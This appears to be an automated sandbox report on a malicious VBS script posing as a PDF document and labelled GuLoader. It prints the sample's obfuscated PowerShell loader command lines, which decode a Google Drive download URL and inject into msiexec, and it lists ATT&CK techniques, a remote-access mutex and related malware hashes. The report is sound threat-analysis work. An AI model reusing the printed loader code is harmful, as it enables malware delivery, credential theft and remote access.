              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $elselskaber;function Xanthorrhiza($Diagnostikkernes){ .($Optimalvaerdi) ($Diagnostikkernes)} function raspite($Ambivalentes){$smaabarnsalderen=4;do{$Summker+=$Ambivalentes[$smaabarnsalderen];$smaabarnsalderen+=5;$Skaberaktapirer=Format-List} until(!$Ambivalentes[$smaabarnsalderen])$Summker}$Spaltedefinitionen=raspite ' ndnHjlpeM thtThra.Lesiw';$Spaltedefinitionen+=raspite 'MasteB,reb Di CTeralSl gIAssieBeh,N irT';$Choremen=raspite 'ro fM ForoSa,izGagsiMpanlUnc lAnt aDeme/';$Polytungstate=raspite 'SaniTGogolStifs Agu1 Afs2';$Hematohidrosis='Inve[No.nNSlutE Rabt K l.AnthSUnexE,essrQuinVMilliTolacMillEStraPTridO PeriContNOpsuT UdvMOm,iA s lNOrgaa B,rgBeg,eStemrKa,e]F,rf:Duch:H.poS HijePh,ecUdfruSnekRProtiIncoT.arayBuckpFlotrSky oVoltTKo goFor cTriao ortlWar =taag$StatP puno griLNeu YEmpeTGoo UOec NSmregTills ShatSv daOvertPrope';$Choremen+=raspite 'Rets5Lede.De i0 enc Doe(AttaW AngiCompn ynkdOp roV.trwFangs Spr S.riNDioxTfaca Misa1T ta0Cruc.Dile0Hjem;Genl UnpeWVulgiNedknRadi6Tilb4Bybu;Sp l K igx nap6Graf4Mu t; Ndt FrorMontvSkib:T mm1Past3 Den4 trl.Unmo0Fal )A la ForsG KnaeMigrcOophkGer,oFjl./Ar.e2Unr 0 V n1Zair0Peri0Skab1benz0Phys1Ran PleFClasi mstrFlaweSeksfuopdo allxPala/du,n1 .nt3Hjul4Rall.Gibb0';$Gyldigheder=raspite 'FormuSociSPo aEKibbRInst-Hr,eANobigExtrEFordnBi eT';$Reaccepted=raspite 'OpdrhPaaktUordt E,cp ActsPort:B,ro/Vldi/ la,dUdsor C.ciUdvivIntae Sid.Car g dskoRag o Th gFeeblP eseUdpa.Outwc emeoSnnemB se/Omn,u ankc Unq?muskeSignx I,rp ormoa rer Bo tK rn=.dspdHensot,ylw DatnSavnlPolyoKonta.occdPree& BigiNajad Gru=B rn1 For2VedlO AmaPIndf5Sho.AS ymsLodnIBathYSdceXTemae.abrKUndeOHairNTes 8 SniaAga z,fveVvend9U peDOlivtM ttsOv r0DomfsUndlJtranh SpijHypnUBo lxOrthJTappTLrlisterrm';$Genette=raspite 'Loph>';$Optimalvaerdi=raspite 'ForuI D 
neChlox';$Trafikkens='Amfibietanken';$Unphilosophize47='\Unapplauding.Ove';Xanthorrhiza (raspite 'Stre$ fsGBomblem.go Kr,b ranaNdteLKut :minyGstumRRatioBrevwKapaLHp te ondDDiff9Af,j6 Myl=G.rt$ TilEsku.NDaugv C b:SomnaSlu pCommp ardd FlyABondt ediaSupe+ Exc$SammUStranInt,pNonpH DifIponyL SupOTopus Proo rnepNonsHSa tIDmpezVoliE chl4Kerm7');Xanthorrhiza (raspite 'udst$ FjeG,hriL IngO AfsB OstaRisplfrdi:BerbeShusr EctyDrontBimah MesrGeneOSpatCMascYT avT ompe Vi SBrdd=,ors$ProbR ForE Sala UndCBag CReveEAmorPHysttautoETuscDSond.SolosAllePReboLGl sibakkTStik(Foot$ kidgBirtEAvilNClube SpatrepatRepuE Coq)');Xanthorrhiza (raspite $Hematohidrosis);$Reaccepted=$Erythrocytes[0];$Beregningsgrundlag=(raspite 'Helb$turiGPi gL keno GriBMaxiaAbmhlRegn:,peckHe dNS goino dPStallNonsiUnsin VirGUnansKabekPreljFritoPa.tl,xfoeLysonInddS Fin=Ki,bnWeaseSalvW Lnk-Quo,O bumBs.spJ,rbaeLodgcGiggT Doo SunfSBrouY recs hawtFlukePartMInv,.Poly$C,mpSDobbpStopa ngalKataTSlamEHemodTromeantifJumbi MetnEgadIKl.mtprovIMalmoVrdin CigEUn rn');Xanthorrhiza ($Beregningsgrundlag);Xanthorrhiza (raspite 'S bi$ ValKGen,nUndeiBolJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "echo $elselskaber;function xanthorrhiza($diagnostikkernes){ .($optimalvaerdi) ($diagnostikkernes)} function raspite($ambivalentes){$smaabarnsalderen=4;do{$summker+=$ambivalentes[$smaabarnsalderen];$smaabarnsalderen+=5;$skaberaktapirer=format-list} until(!$ambivalentes[$smaabarnsalderen])$summker}$spaltedefinitionen=raspite ' ndnhjlpem thtthra.lesiw';$spaltedefinitionen+=raspite 'masteb,reb di cteralsl giassiebeh,n irt';$choremen=raspite 'ro fm forosa,izgagsimpanlunc lant ademe/';$polytungstate=raspite 'sanitgogolstifs agu1 afs2';$hematohidrosis='inve[no.nnslute rabt k l.anthsunexe,essrquinvmillitolacmillestraptrido pericontnopsut udvmom,ia s lnorgaa b,rgbeg,estemrka,e]f,rf:duch:h.pos hijeph,ecudfrusnekrprotiincot.araybuckpflotrsky ovolttko gofor ctriao ortlwar =taag$statp puno grilneu yempetgoo uoec nsmregtills shatsv daovertprope';$choremen+=raspite 'rets5lede.de i0 enc doe(attaw angicompn ynkdop rov.trwfangs spr s.rindioxtfaca misa1t ta0cruc.dile0hjem;genl unpewvulginedknradi6tilb4bybu;sp l k igx nap6graf4mu t; ndt frormontvskib:t mm1past3 den4 trl.unmo0fal )a la forsg knaemigrcoophkger,ofjl./ar.e2unr 0 v n1zair0peri0skab1benz0phys1ran plefclasi mstrflaweseksfuopdo allxpala/du,n1 .nt3hjul4rall.gibb0';$gyldigheder=raspite 'formusocispo aekibbrinst-hr,eanobigextrefordnbi et';$reaccepted=raspite 'opdrhpaaktuordt e,cp actsport:b,ro/vldi/ la,dudsor c.ciudvivintae sid.car g dskorag o th gfeeblp eseudpa.outwc emeosnnemb se/omn,u ankc unq?muskesignx i,rp ormoa rer bo tk rn=.dspdhensot,ylw datnsavnlpolyokonta.occdpree& biginajad gru=b rn1 for2vedlo amapindf5sho.as ymslodnibathysdcextemae.abrkundeohairntes 8 sniaaga z,fvevvend9u pedolivtm ttsov r0domfsundljtranh spijhypnubo lxorthjtapptlrlisterrm';$genette=raspite 'loph>';$optimalvaerdi=raspite 'forui d 
nechlox';$trafikkens='amfibietanken';$unphilosophize47='\unapplauding.ove';xanthorrhiza (raspite 'stre$ fsgbomblem.go kr,b ranandtelkut :minygstumrratiobrevwkapalhp te ondddiff9af,j6 myl=g.rt$ tilesku.ndaugv c b:somnaslu pcommp ardd flyabondt ediasupe+ exc$sammustranint,pnonph difiponyl supotopus proo rnepnonshsa tidmpezvolie chl4kerm7');xanthorrhiza (raspite 'udst$ fjeg,hril ingo afsb ostarisplfrdi:berbeshusr ectydrontbimah mesrgeneospatcmascyt avt ompe vi sbrdd=,ors$probr fore sala undcbag creveeamorphysttautoetuscdsond.solosalleprebolgl sibakktstik(foot$ kidgbirteavilnclube spatrepatrepue coq)');xanthorrhiza (raspite $hematohidrosis);$reaccepted=$erythrocytes[0];$beregningsgrundlag=(raspite 'helb$turigpi gl keno gribmaxiaabmhlregn:,peckhe dns goino dpstallnonsiunsin virgunanskabekpreljfritopa.tl,xfoelysonindds fin=ki,bnweasesalvw lnk-quo,o bumbs.spj,rbaelodgcgiggt doo sunfsbrouy recs hawtflukepartminv,.poly$c,mpsdobbpstopa ngalkatatslamehemodtromeantifjumbi metnegadikl.mtprovimalmovrdin cigeun rn');xanthorrhiza ($beregningsgrundlag);xanthorrhiza (raspite 's bi$ valkgen,nundeibol
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\System32\wscript.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara match, File source: 0000000C.00000002.2222859365.00000000075BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: Process Memory Space: msiexec.exe PID: 4752, type: MEMORYSTR

              Remote Access Functionality

              Source: C:\Windows\SysWOW64\msiexec.exe, Mutex created: \Sessions\1\BaseNamedObjects\Rmc-EOQLI8
              Source: Yara match, File source: 0000000C.00000002.2222859365.00000000075BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: Process Memory Space: msiexec.exe PID: 4752, type: MEMORYSTR
              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | 321 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 321 Scripting | 311 Process Injection | 1 Masquerading | OS Credential Dumping | 11 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
              Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Remote Access Software | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 311 Process Injection | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Software Packing | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | 13 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
              Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 13 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
              [Behavior graph: ID 1634191, Sample: Document BT24#U00b7pdf.vbs, Startdate: 10/03/2025, Architecture: WINDOWS, Score: 100]

              Source | Detection | Scanner | Label | Link
              Document BT24#U00b7pdf.vbs | 15% | Virustotal | | Browse
              Document BT24#U00b7pdf.vbs | 18% | ReversingLabs | Script-WScript.Trojan.Guloader |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label | Link
              https://drive.usercontent.google.com( | 0% | Avira URL Cloud | safe |
              https://go.microsoft.co | 0% | Avira URL Cloud | safe |
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              drive.google.com | 142.250.181.238 | true | false | | high
              drive.usercontent.google.com | 172.217.16.193 | true | false | | high
              Host_6637.6637.6637.657e | unknown | unknown | false | | high
              Name | Source | Malicious | Antivirus Detection | Reputation
              https://www.google.com | powershell.exe, 00000003.00000002.1536459249.0000026D005A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D00580000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D005A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2178021460.00000000075EC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2222859365.00000000075E7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113833968.000000000762B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113645596.00000000075EF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113645596.00000000075E0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2177947972.00000000075E7000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.1582725505.0000026D10079000.00000004.00000800.00020000.00000000.sdmp | false | | high
              http://drive.usercontent.google.com | powershell.exe, 00000003.00000002.1536459249.0000026D005BC000.00000004.00000800.00020000.00000000.sdmp | false | | high
              http://pesterbdd.com/images/Pester.png | powershell.exe, 00000003.00000002.1536459249.0000026D00227000.00000004.00000800.00020000.00000000.sdmp | false | | high
              https://go.microsoft.co | powershell.exe, 00000003.00000002.1590762513.0000026D744A2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://aka.ms/pscore6lB | powershell.exe, 00000008.00000002.1952137250.0000000004A21000.00000004.00000800.00020000.00000000.sdmp | false | | high
              http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000003.00000002.1536459249.0000026D00227000.00000004.00000800.00020000.00000000.sdmp | false | | high
              https://drive.google.com/ | msiexec.exe, 0000000C.00000002.2222859365.000000000757A000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://drive.usercontent.google.com( | powershell.exe, 00000003.00000002.1536459249.0000026D00BBB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://contoso.com/ | powershell.exe, 00000003.00000002.1582725505.0000026D10079000.00000004.00000800.00020000.00000000.sdmp | false | | high
              https://drive.usercontent.google.com/% | msiexec.exe, 0000000C.00000003.2178021460.00000000075EC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2222859365.00000000075E7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2177947972.00000000075E7000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.1582725505.0000026D10079000.00000004.00000800.00020000.00000000.sdmp | false | | high
              https://contoso.com/License | powershell.exe, 00000003.00000002.1582725505.0000026D10079000.00000004.00000800.00020000.00000000.sdmp | false | | high
              https://drive.google.com/q | msiexec.exe, 0000000C.00000002.2222859365.000000000757A000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://contoso.com/Icon | powershell.exe, 00000003.00000002.1582725505.0000026D10079000.00000004.00000800.00020000.00000000.sdmp | false | | high
              https://drive.google.com | powershell.exe, 00000003.00000002.1536459249.0000026D005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D00495000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D0057B000.00000004.00000800.00020000.00000000.sdmp | false | | high
              https://drive.usercontent.google.com | powershell.exe, 00000003.00000002.1536459249.0000026D005A6000.00000004.00000800.00020000.00000000.sdmp | false | | high
              https://drive.usercontent.google.com/z | msiexec.exe, 0000000C.00000003.2178021460.00000000075EC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2222859365.00000000075E7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2177947972.00000000075E7000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://drive.google.com | powershell.exe, 00000003.00000002.1536459249.0000026D00580000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D005BC000.00000004.00000800.00020000.00000000.sdmp | false | | high
              https://aka.ms/pscore68 | powershell.exe, 00000003.00000002.1536459249.0000026D00001000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                                        https://apis.google.compowershell.exe, 00000003.00000002.1536459249.0000026D005A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D00580000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D005A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2178021460.00000000075EC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2222859365.00000000075E7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113833968.000000000762B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113645596.00000000075EF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113645596.00000000075E0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2177947972.00000000075E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1536459249.0000026D00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1952137250.0000000004A21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://crl.vpowershell.exe, 00000003.00000002.1590762513.0000026D74440000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1536459249.0000026D00227000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.181.238 | drive.google.com | United States | 15169 | GOOGLEUS | false
172.217.16.193 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
                                                                Joe Sandbox version:42.0.0 Malachite
                                                                Analysis ID:1634191
                                                                Start date and time:2025-03-10 20:36:44 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 6m 47s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:21
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:1
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:Document BT24#U00b7pdf.vbs
                                                                renamed because original name is a hash value
                                                                Original Sample Name:Document BT24pdf.vbs
                                                                Detection:MAL
                                                                Classification:mal100.troj.expl.evad.winVBS@12/7@3/2
                                                                EGA Information:Failed
                                                                HCA Information:
                                                                • Successful, ratio: 80%
                                                                • Number of executed functions: 43
                                                                • Number of non-executed functions: 5
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .vbs
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, BackgroundTransferHost.exe, consent.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                • Excluded IPs from analysis (whitelisted): 23.60.203.209, 20.12.23.50, 150.171.27.10, 172.202.163.200
                                                                • Excluded domains from analysis (whitelisted): c2a9c95e369881c67228a6591cac2686.clo.footprintdns.com, ax-ring.msedge.net, fs.microsoft.com, slscr.update.microsoft.com, g.bing.com, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target powershell.exe, PID 2112 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 7624 because it is empty
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
15:37:38 | API Interceptor | 152x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
3b5074b1b5d032e5620f69f9f700ff0e | q2e132qweertgd.exe.bin.exe | malicious | AsyncRAT, XWorm
3b5074b1b5d032e5620f69f9f700ff0e | lalaloopy.hta | malicious | Unknown
3b5074b1b5d032e5620f69f9f700ff0e | SNKO05B241100201.exe | malicious | Snake Keylogger, VIP Keylogger
3b5074b1b5d032e5620f69f9f700ff0e | SNKO05B241100201..exe | malicious | Snake Keylogger, VIP Keylogger
3b5074b1b5d032e5620f69f9f700ff0e | SNKO05B241100201.exe | malicious | Snake Keylogger
3b5074b1b5d032e5620f69f9f700ff0e | Inst#U0430ll.exe | malicious | LummaC Stealer, Xmrig
3b5074b1b5d032e5620f69f9f700ff0e | sNtelKBdvr.exe | malicious | Snake Keylogger, VIP Keylogger
3b5074b1b5d032e5620f69f9f700ff0e | B599ZYjsg4.exe | malicious | Snake Keylogger, VIP Keylogger
3b5074b1b5d032e5620f69f9f700ff0e | LdksctiMff.exe | malicious | GuLoader, Snake Keylogger
3b5074b1b5d032e5620f69f9f700ff0e | gcXBQbWQ1p.exe | malicious | Snake Keylogger, VIP Keylogger
37f463bf4616ecd445d4a1937da06e19 | rgk62zzDVd.exe | malicious | GuLoader, Snake Keylogger
37f463bf4616ecd445d4a1937da06e19 | pgsAuwtaJ4.exe | malicious | GuLoader
37f463bf4616ecd445d4a1937da06e19 | ESrG8c98zz.exe | malicious | GuLoader, Snake Keylogger
37f463bf4616ecd445d4a1937da06e19 | ZS0Uo8zwGk.exe | malicious | GuLoader, Snake Keylogger
37f463bf4616ecd445d4a1937da06e19 | LhMU00WNoQ.exe | malicious | FormBook, GuLoader
37f463bf4616ecd445d4a1937da06e19 | LdksctiMff.exe | malicious | GuLoader, Snake Keylogger
37f463bf4616ecd445d4a1937da06e19 | UWCCivkQKO.exe | malicious | GuLoader, Snake Keylogger
37f463bf4616ecd445d4a1937da06e19 | ResPencil.5.6.1.exe | malicious | Unknown
37f463bf4616ecd445d4a1937da06e19 | QUo9fr3nQW.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger
37f463bf4616ecd445d4a1937da06e19 | Z4nC253E8n.exe | malicious | Unknown
Context (identical for every row above): 142.250.181.238, 172.217.16.193
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):11608
                                                                Entropy (8bit):4.8908305915084105
                                                                Encrypted:false
                                                                SSDEEP:192:yVsm5eml2ib4LxoeRm3YrKkzYFQ9smKp5pVFn3eGOVpN6K3bkkjo5xgkjDt4iWNH:yCib4PYbLVoGIpN6KQkj2qkjh4iUx6iP
                                                                MD5:FE1902820A1CE8BD18FD85043C4D9C5C
                                                                SHA1:62F24EAE4A42BA3AE454A6FAB07EF47D1FE9DFD6
                                                                SHA-256:8BBDC66564B509C80EA7BE85EA9632ACD0958008624B829EA4A24895CA73D994
                                                                SHA-512:8D1BADE448F0C53D6EC00BC9FACDBCB1D4B1B7C61E91855206A08BDBF61C6E4A40210574C4193463C8A13AE692DD80897F3CE9E39958472705CF17D77FE9C1D9
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:PSMODULECACHE.....$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):1.1940658735648508
                                                                Encrypted:false
                                                                SSDEEP:3:Nlllulbnolz:NllUc
                                                                MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                Malicious:false
                                                                Preview:@...e................................................@..........
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):516244
                                                                Entropy (8bit):5.8369776599410255
                                                                Encrypted:false
                                                                SSDEEP:12288:Bkc9z68J+X1BXPTh+LjVpQsFCYqr9Z5Te+qfqGw:Bkc9WYE0VpQrY+S+xGw
                                                                MD5:A440C84F6D61903AAE8B5D0A7351320B
